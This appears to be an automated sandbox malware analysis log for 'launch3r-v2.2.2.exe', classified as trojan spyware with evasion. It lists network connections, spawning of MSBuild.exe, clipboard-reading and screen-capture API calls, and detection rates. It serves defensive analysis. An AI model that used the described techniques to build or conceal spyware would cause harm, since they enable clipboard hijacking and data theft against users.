            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
            Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49692 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49693 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49694 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49695 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49696 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49697 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49698 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.22.10:443 -> 192.168.2.5:49700 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043D630 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,3_2_0043D630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_030C1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GetClipboardSequenceNumber,GlobalAlloc,GlobalLock,GetClipboardSequenceNumber,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,GetClipboardSequenceNumber,Sleep,CloseClipboard,GetClipboardSequenceNumber,3_2_030C1000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043D630 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,3_2_0043D630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043D7F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectObject,BitBlt,SelectObject,3_2_0043D7F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040C250 NtOpenSemaphore,3_2_0040C250
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D130000_2_00007FF692D13000
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692CF55C00_2_00007FF692CF55C0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D9A01C0_2_00007FF692D9A01C
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0E02F0_2_00007FF692D0E02F
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1E8000_2_00007FF692D1E800
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D9280C0_2_00007FF692D9280C
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D2C7C00_2_00007FF692D2C7C0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D5CFC00_2_00007FF692D5CFC0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D14FD00_2_00007FF692D14FD0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D167D00_2_00007FF692D167D0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D8D7980_2_00007FF692D8D798
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0CB800_2_00007FF692D0CB80
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1CB800_2_00007FF692D1CB80
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0E7900_2_00007FF692D0E790
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D28F400_2_00007FF692D28F40
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D113400_2_00007FF692D11340
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D17D200_2_00007FF692D17D20
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1D5200_2_00007FF692D1D520
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1BD200_2_00007FF692D1BD20
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D171000_2_00007FF692D17100
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D245000_2_00007FF692D24500
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1AD100_2_00007FF692D1AD10
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D108E00_2_00007FF692D108E0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0A8E00_2_00007FF692D0A8E0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D184E00_2_00007FF692D184E0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D8C4F00_2_00007FF692D8C4F0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D060F00_2_00007FF692D060F0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0F8C00_2_00007FF692D0F8C0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D2ACD00_2_00007FF692D2ACD0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1B8D00_2_00007FF692D1B8D0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D18CB00_2_00007FF692D18CB0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692CF50B00_2_00007FF692CF50B0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692DA0C940_2_00007FF692DA0C94
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0C8900_2_00007FF692D0C890
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0F4600_2_00007FF692D0F460
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1A8600_2_00007FF692D1A860
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D312200_2_00007FF692D31220
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D142300_2_00007FF692D14230
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0FDE00_2_00007FF692D0FDE0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1D1F00_2_00007FF692D1D1F0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1CDF00_2_00007FF692D1CDF0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D151C00_2_00007FF692D151C0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0D9C00_2_00007FF692D0D9C0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0A5A00_2_00007FF692D0A5A0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D8D99C0_2_00007FF692D8D99C
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0D1B00_2_00007FF692D0D1B0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D8D5940_2_00007FF692D8D594
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0AD900_2_00007FF692D0AD90
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D241900_2_00007FF692D24190
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D199700_2_00007FF692D19970
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0B9400_2_00007FF692D0B940
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D305500_2_00007FF692D30550
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D189500_2_00007FF692D18950
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D279500_2_00007FF692D27950
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D2EB300_2_00007FF692D2EB30
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D8E7280_2_00007FF692D8E728
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D9A3040_2_00007FF692D9A304
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D9A6FC0_2_00007FF692D9A6FC
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D92F100_2_00007FF692D92F10
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D1AB100_2_00007FF692D1AB10
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D2A6E00_2_00007FF692D2A6E0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D902C00_2_00007FF692D902C0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D28AC00_2_00007FF692D28AC0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D16AD00_2_00007FF692D16AD0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D276D00_2_00007FF692D276D0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D8CAA00_2_00007FF692D8CAA0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D136A00_2_00007FF692D136A0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D24AB00_2_00007FF692D24AB0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692CF32B00_2_00007FF692CF32B0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D296900_2_00007FF692D29690
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0C2900_2_00007FF692D0C290
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692DA3E600_2_00007FF692DA3E60
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D2C2700_2_00007FF692D2C270
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D23A700_2_00007FF692D23A70
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D0666E0_2_00007FF692D0666E
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D206400_2_00007FF692D20640
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeCode function: 0_2_00007FF692D29A500_2_00007FF692D29A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043683A3_2_0043683A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040E8C43_2_0040E8C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044D0D03_2_0044D0D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004198993_2_00419899
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042F1703_2_0042F170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040D9203_2_0040D920
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004462203_2_00446220
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004422C03_2_004422C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00418B003_2_00418B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00403B103_2_00403B10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00414C3C3_2_00414C3C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00415C803_2_00415C80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00411D543_2_00411D54
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044C5703_2_0044C570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004105103_2_00410510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004265103_2_00426510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041E5F23_2_0041E5F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00410DB03_2_00410DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00441E703_2_00441E70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040B6903_2_0040B690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040EEA53_2_0040EEA5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043BF503_2_0043BF50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00434F603_2_00434F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044877D3_2_0044877D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041F7B03_2_0041F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040A0403_2_0040A040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042E0603_2_0042E060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004470603_2_00447060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A07E3_2_0041A07E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004138133_2_00413813
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004020203_2_00402020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043B0203_2_0043B020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042C0C13_2_0042C0C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044A8C03_2_0044A8C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042F8E73_2_0042F8E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A8FA3_2_0041A8FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004240903_2_00424090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042D8A53_2_0042D8A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044B9403_2_0044B940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040C9703_2_0040C970
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004329013_2_00432901
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044B9E03_2_0044B9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042B9F03_2_0042B9F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044A1803_2_0044A180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004239903_2_00423990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004391BA3_2_004391BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040AA403_2_0040AA40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040C2503_2_0040C250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004092603_2_00409260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044BA703_2_0044BA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044CA703_2_0044CA70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00422A013_2_00422A01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00407A103_2_00407A10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004152C13_2_004152C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004482C03_2_004482C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041C2D73_2_0041C2D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044AB103_2_0044AB10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043D3203_2_0043D320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041C32F3_2_0041C32F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004023D03_2_004023D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004433D03_2_004433D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004303823_2_00430382
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041245E3_2_0041245E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004234793_2_00423479
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042DC003_2_0042DC00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004044223_2_00404422
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004224C03_2_004224C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00408CE03_2_00408CE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042B4E83_2_0042B4E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00410CF13_2_00410CF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00443CF03_2_00443CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043AC803_2_0043AC80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00438C883_2_00438C88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004234973_2_00423497
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00420CB03_2_00420CB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044A5503_2_0044A550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004415603_2_00441560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044CD703_2_0044CD70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00412D003_2_00412D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00430D0D3_2_00430D0D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00423D103_2_00423D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043CDD03_2_0043CDD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00435DF53_2_00435DF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004275B03_2_004275B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004476403_2_00447640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040F6703_2_0040F670
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00428E723_2_00428E72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00422E103_2_00422E10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042BEC03_2_0042BEC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040BEE03_2_0040BEE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00443EF03_2_00443EF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004466803_2_00446680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004296843_2_00429684
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004256B03_2_004256B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00449EB03_2_00449EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0044B6B03_2_0044B6B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0043A75F3_2_0043A75F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041577B3_2_0041577B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004087003_2_00408700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004417C03_2_004417C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00421FD93_2_00421FD9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00442FE03_2_00442FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00426F803_2_00426F80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0042FF943_2_0042FF94
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00431F9C3_2_00431F9C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004317A23_2_004317A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004377B03_2_004377B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_030C11E03_2_030C11E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00418AF0 appears 97 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0040B0D0 appears 48 times
            Source: launch3r-v2.2.2.exeStatic PE information: Number of sections : 13 > 10
            Source: launch3r-v2.2.2.exe, 00000000.00000002.1314485545.000001B9628BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHH.exe4 vs launch3r-v2.2.2.exe
            Source: launch3r-v2.2.2.exe, 00000000.00000002.1316181937.00007FF692E7C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHH.exe4 vs launch3r-v2.2.2.exe
            Source: launch3r-v2.2.2.exeBinary or memory string: OriginalFilenameHH.exe4 vs launch3r-v2.2.2.exe
            Source: launch3r-v2.2.2.exeStatic PE information: Section: .jss ZLIB complexity 1.0003278762662808
            Source: launch3r-v2.2.2.exeStatic PE information: Section: .jss ZLIB complexity 1.0003278762662808
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@4/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004422C0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_004422C0
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: launch3r-v2.2.2.exeVirustotal: Detection: 30%
            Source: launch3r-v2.2.2.exeReversingLabs: Detection: 27%
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeFile read: C:\Users\user\Desktop\launch3r-v2.2.2.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\launch3r-v2.2.2.exe "C:\Users\user\Desktop\launch3r-v2.2.2.exe"
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\launch3r-v2.2.2.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
